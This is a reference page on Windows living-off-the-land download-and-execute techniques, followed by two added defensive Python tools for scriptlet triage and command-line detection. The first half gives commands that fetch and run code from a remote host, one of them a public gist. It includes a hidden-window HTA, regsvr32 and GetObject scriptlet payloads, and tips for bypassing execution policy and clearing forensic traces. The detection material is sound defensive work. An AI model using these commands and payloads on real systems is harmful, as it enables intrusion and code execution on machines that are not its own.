Summary of Windows download-and-execute techniques
PowerShell
Script execution is normally limited by the execution policy; either change the policy or bypass it for a single process (powershell -ExecutionPolicy Bypass -File script.ps1). The execution policy only guards against running scripts by accident and is not a security boundary, so defenders should not rely on it.
Get-ExecutionPolicy    show the current execution policy
Set-ExecutionPolicy Unrestricted    change the execution policy (the default LocalMachine scope needs an elevated prompt; add -Scope CurrentUser otherwise)
Download a file with WebClient:
$client = New-Object System.Net.WebClient
$client.DownloadFile('url','path')
The same as a one-liner from cmd.exe:
powershell -c "(New-Object System.Net.WebClient).DownloadFile('url','path')"
IPC$ / SMB share
Copy the file from a share on the attacker host (open a session to the share first, e.g. with net use):
copy \\192.168.1.\file path
certutil
certutil -urlcache -split -f url filename
-urlcache also stores a copy in certutil's URL cache (CryptnetUrlCache under the user's AppData\LocalLow), which is a well-known forensic indicator; certutil -urlcache * delete clears it.
bitsadmin
bitsadmin /transfer n url path
n is an arbitrary job name and path must be an absolute local path. BITS jobs are recorded in the Microsoft-Windows-Bits-Client event log and persist across reboots, so they stay visible to defenders after the file has landed.
msiexec
First generate the MSI package (here an msfvenom payload that runs calc.exe):
msfvenom -f msi -p windows/exec CMD=calc.exe > test.msi
Then install it straight from the URL (/q silent, /i install):
msiexec /q /i http://192.168.1.1/test.msi
IEExec
IEExec.exe ships with the .NET Framework; look for it in the framework install directory (e.g. C:\Windows\Microsoft.NET\Framework\v2.0.50727\IEExec.exe). It launches a managed executable from a URL, so test.exe must be a .NET assembly, not a native PE.
caspol -s off    turns off .NET code-access security, which would otherwise block the remote assembly (needs an elevated prompt)
IEExec http://192.168.1.1/test.exe
mshta
mshta http://192.168.1.1/run.hta
run.hta (the window is resized to 0x0 and moved off-screen so nothing is visible; put the command to run in objShell.Run):
<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "cmd.exe /c net user" ' put the command to run here
self.close
</script>
</HEAD>
<body>
test
</body>
</HTML>
mshta running inline VBScript
mshta vbscript:CreateObject("Wscript.Shell").Run("calc.exe",0,true)(window.close)
mshta running inline JavaScript
mshta javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im mshta.exe",0,true);}
rundll32
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://192.168.1.1/calc.wsc")
calc.wsc (a Windows Script Component; the JScript inside runs when GetObject loads it):
<?xml version="1.0"?>
<package>
<component id="testCalc">
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</component>
</package>
rundll32 running an HTA
rundll32.exe url.dll,OpenURL "calc.hta"
calc.hta:
<html><head><script>
a=new ActiveXObject("WScript.shell");
a.run('%windir%\\System32\\cmd.exe /c calc.exe',0);
window.close();
</script></head></html>
rundll32 running a .url file
rundll32.exe ieframe.dll,OpenURL <path to local .url file>
rundll32.exe url.dll,OpenURL <path to local .url file>
rundll32.exe shdocvw.dll,OpenURL <path to local .url file>
Contents of the .url file (the [InternetShortcut] section header is required for the file to be treated as an Internet shortcut):
[InternetShortcut]
URL=file:///c:\windows\system32\calc.exe
regsvr32
regsvr32 /u /s /i:http://192.168.1.1/test.png scrobj.dll
/s silent, /u unregister, /i passes the URL to scrobj.dll's DllInstall, which fetches and runs the scriptlet regardless of its extension (here .png).
test.png (a COM scriptlet):
<?XML version="1.0"?>
<scriptlet>
<registration
progid="ShortJSRAT"
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Learn from Casey Smith @subTee -->
<script language="JScript">
<![CDATA[
ps = "cmd.exe /c calc.exe";
new ActiveXObject("WScript.Shell").Run(ps,0,true);
]]>
</script>
</registration>
</scriptlet>
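When one of these scriptlets is recovered (from a proxy cache, or because the regsvr32 /i: or GetObject("script:...") URL in a command line is still reachable), the first triage question is what the embedded script does. The Python below is an added example for this page, not the page author's code: it pulls the registration attributes and script bodies out of .sct/.wsc files like the calc.wsc and test.png shown above and flags the COM ProgIDs that indicate process execution or download. The three samples are constructed for the example (the first two are modelled on the page's files, the all-zero classid in the third is a placeholder), and the indicator list is this example's own choice. Two robustness points a practitioner hits immediately are handled: the uppercase <?XML ...?> declaration that the regsvr32 scriptlet carries is rejected by a strict XML parser, and a raw < in a script body outside CDATA makes the file non-well-formed, so the parser drops the declaration first and falls back to a regex scan when expat gives up.

```python
"""Triage Windows COM scriptlets (.sct / .wsc) of the kind loaded by
regsvr32 /i:<url> scrobj.dll and GetObject("script:<url>").

Added example for this page, not the page author's code. The three samples
are constructed (the all-zero classid is a placeholder); INDICATORS is this
example's own list of COM ProgIDs that signal execution or download.
"""
import re
import xml.etree.ElementTree as ET

INDICATORS = {
    "WScript.Shell": "spawns a process with WScript.Shell.Run",
    "Shell.Application": "spawns a process with ShellExecute",
    "MSXML2.XMLHTTP": "downloads over HTTP",
    "Microsoft.XMLHTTP": "downloads over HTTP",
    "ADODB.Stream": "writes a downloaded payload to disk",
    "Scripting.FileSystemObject": "reads or writes files",
}

_XML_DECL = re.compile(r"^\s*<\?xml[^>]*\?>", re.I)
_SCRIPT_TAG = re.compile(
    r"<script\b[^>]*?language\s*=\s*[\"']([^\"']+)[\"'][^>]*>(.*?)</script>",
    re.I | re.S)
_CDATA = re.compile(r"<!\[CDATA\[(.*?)\]\]>", re.S)


def _strip_cdata(text):
    """Return only the CDATA payload(s) if present, else the raw text."""
    return "".join(_CDATA.findall(text)) if "<![CDATA[" in text else text


def extract_scripts(data):
    """Return [(language, code), ...] for every <script> element.

    The "<?XML ...?>" declaration seen in regsvr32 scriptlets is not a valid
    XML declaration for a strict parser, so it is dropped first. If the
    document still is not well-formed (raw '<' in a script body without
    CDATA), fall back to a regex scan of <script> elements.
    """
    data = _XML_DECL.sub("", data, count=1)
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return [(lang, _strip_cdata(body).strip())
                for lang, body in _SCRIPT_TAG.findall(data)]
    return [(el.get("language", "?"), (el.text or "").strip())
            for el in root.iter("script")]


def registration(data):
    """Return the <registration> attributes (progid, classid, ...) with lowercased keys, or {}."""
    m = re.search(r"<registration\b([^>]*)>", data, re.I | re.S)
    if not m:
        return {}
    attrs = re.findall(r"(\w+)\s*=\s*[\"']([^\"']*)[\"']", m.group(1))
    return {k.lower(): v for k, v in attrs}


def triage(data):
    """Summarise one scriptlet: registration, scripts, indicators hit, verdict."""
    scripts = extract_scripts(data)
    blob = "\n".join(code for _, code in scripts).lower()
    indicators = sorted(api for api in INDICATORS if api.lower() in blob)
    return {
        "registration": registration(data),
        "scripts": scripts,
        "indicators": indicators,
        "verdict": "suspicious" if indicators else "review manually",
    }


# Sample 1: modelled on the page's test.png (regsvr32 scriptlet), uppercase
# "<?XML" declaration included because that is how these files show up.
SCT_SAMPLE = """<?XML version="1.0"?>
<scriptlet>
<registration
progid="ShortJSRAT"
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">
<![CDATA[
ps = "cmd.exe /c calc.exe";
new ActiveXObject("WScript.Shell").Run(ps,0,true);
]]>
</script>
</registration>
</scriptlet>
"""

# Sample 2: modelled on the page's calc.wsc (GetObject("script:...") component).
WSC_SAMPLE = """<?xml version="1.0"?>
<package>
<component id="testCalc">
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</component>
</package>
"""

# Sample 3: constructed; the raw "<" in the VBScript is not well-formed XML,
# so this exercises the regex fallback. The classid is a placeholder.
BROKEN_SAMPLE = """<scriptlet>
<registration progid="Test" classid="{00000000-0000-0000-0000-000000000000}">
<script language="VBScript">
Set o = CreateObject("Shell.Application")
If 1 < 2 Then o.ShellExecute "calc.exe", "", "", "open", 0
</script>
</registration>
</scriptlet>
"""

if __name__ == "__main__":
    for name, sample in (("sct", SCT_SAMPLE), ("wsc", WSC_SAMPLE), ("broken", BROKEN_SAMPLE)):
        result = triage(sample)
        print(name, result["verdict"], result["registration"], result["indicators"])
```

The regex fallback is deliberately loose (it only needs the script body, not a valid DOM), because the goal at triage time is to see the command being run, not to validate the file; a string match on ProgIDs will miss scripts that build the ProgID at runtime, so treat "review manually" as a prompt to read the code, not as a clean verdict.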
pubprn.vbs
cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct
The Printing_Admin_Scripts folder name is locale-specific (zh-CN here, en-US on English installs). pubprn.vbs hands its second argument to GetObject(), so a script: moniker pointing at a .sct is fetched and executed under a Microsoft-signed script.
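Every technique above leaves a distinctive command line in process-creation telemetry (Sysmon Event ID 1, or Security event 4688 with command-line auditing enabled), which is the cheapest place to catch them. As an added defensive check for this page, not something from the original author, the Python below encodes one rule per technique and runs them over a set of constructed command lines, including a few benign ones that must not fire. The rule names are this example's own; the log lines are made up for the example and are not real telemetry.

```python
"""Flag process command lines that match the download-and-execute LOLBin
patterns listed on this page.

Added example for this page, not code from the page's author. The lines in
SAMPLE_COMMAND_LINES are constructed, and the rule names are this example's
own; feed real CommandLine fields from Sysmon Event ID 1 / Security 4688.
"""
import re

# (rule name, regex over the full command line). Case-insensitive, and both
# "-" and "/" switch prefixes are accepted because the tools accept either
# and attackers mix them to dodge naive substring matches.
RULES = [
    ("certutil_urlcache_download",
     re.compile(r"\bcertutil(?:\.exe)?\b.*[-/]urlcache\b.*https?://", re.I)),
    ("bitsadmin_transfer",
     re.compile(r"\bbitsadmin(?:\.exe)?\b.*[-/]transfer\b.*https?://", re.I)),
    ("msiexec_remote_package",
     re.compile(r"\bmsiexec(?:\.exe)?\b.*[-/]i\s+https?://", re.I)),
    ("mshta_remote_or_inline",
     re.compile(r"\bmshta(?:\.exe)?\b.*(?:https?://|vbscript:|javascript:)", re.I)),
    ("regsvr32_scriptlet",
     re.compile(r"\bregsvr32(?:\.exe)?\b.*[-/]i:\s*https?://.*scrobj\.dll", re.I)),
    ("rundll32_javascript",
     re.compile(r"\brundll32(?:\.exe)?\b.*javascript:", re.I)),
    ("rundll32_openurl",
     re.compile(r"\brundll32(?:\.exe)?\b.*\b(?:url|ieframe|shdocvw)\.dll\s*,\s*OpenURL\b", re.I)),
    ("pubprn_scriptlet",
     re.compile(r"pubprn\.vbs\b.*\bscript:\s*https?://", re.I)),
    ("ieexec_remote_assembly",
     re.compile(r"\bieexec(?:\.exe)?\b.*https?://", re.I)),
    ("powershell_webclient_download",
     re.compile(r"\bpowershell(?:\.exe)?\b.*Net\.WebClient.*Download(?:File|String)", re.I)),
]


def classify(cmdline):
    """Return the names of every rule the command line matches (empty if none)."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan(lines):
    """Return [(line, [rule, ...]), ...] for lines that match at least one rule."""
    results = []
    for line in lines:
        hits = classify(line)
        if hits:
            results.append((line, hits))
    return results


# Constructed sample telemetry: ten attacker-style lines mirroring this page,
# then three benign lines that must produce no hits.
SAMPLE_COMMAND_LINES = [
    'certutil -urlcache -split -f http://192.168.1.1/test.exe test.exe',
    'CERTUTIL.EXE /URLCACHE /SPLIT /F http://192.168.1.1/a.exe a.exe',
    'bitsadmin /transfer n http://192.168.1.1/test.exe C:\\Users\\Public\\test.exe',
    'msiexec /q /i http://192.168.1.1/test.msi',
    'mshta http://192.168.1.1/run.hta',
    'mshta vbscript:CreateObject("Wscript.Shell").Run("calc.exe",0,true)(window.close)',
    'regsvr32 /u /s /i:http://192.168.1.1/test.png scrobj.dll',
    'rundll32.exe url.dll,OpenURL "calc.hta"',
    'cscript /b C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\pubprn.vbs 127.0.0.1 script:https://example.invalid/test.sct',
    'powershell -c "(New-Object System.Net.WebClient).DownloadFile(\'http://192.168.1.1/a.exe\',\'a.exe\')"',
    'certutil -hashfile C:\\Windows\\notepad.exe SHA256',
    'msiexec /i C:\\Setup\\product.msi /qn',
    'rundll32.exe shell32.dll,Control_RunDLL',
]

if __name__ == "__main__":
    for line, hits in scan(SAMPLE_COMMAND_LINES):
        print(", ".join(hits), "<-", line)
```

These rules match the literal forms on this page; cmd.exe caret escapes, environment-variable substitution and PowerShell encoded commands all defeat a plain regex, so log the resolved command line rather than the raw one where the sensor allows it, and pair the rules with a second signal such as an image load of scrobj.dll by regsvr32 or a network connection from certutil.exe, which the obfuscation does not hide.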